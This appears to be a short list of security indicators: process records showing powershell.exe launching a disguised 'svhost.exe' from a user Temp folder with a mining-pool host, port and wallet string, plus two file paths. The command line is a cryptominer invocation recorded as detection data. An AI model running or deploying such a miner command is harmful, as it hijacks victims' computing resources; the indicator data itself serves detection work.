parent_process powershell.exe martian_process "C:\Users\test22\AppData\Local\Temp\svhost.exe" -d spr.tw-pool.com:14001 -w spectre:qz0cgt779szpg35c5m33ssq4eyxvnlg97en5zsw8mtgs6u9xhhrax3l95qdxa.WNDALL
parent_process powershell.exe martian_process C:\Users\test22\AppData\Local\Temp\svhost.exe -d spr.tw-pool.com:14001 -w spectre:qz0cgt779szpg35c5m33ssq4eyxvnlg97en5zsw8mtgs6u9xhhrax3l95qdxa.WNDALL
file C:\Windows\System32\lsm.exe
file C:\Users\test22\AppData\Local\Temp\svhost.exe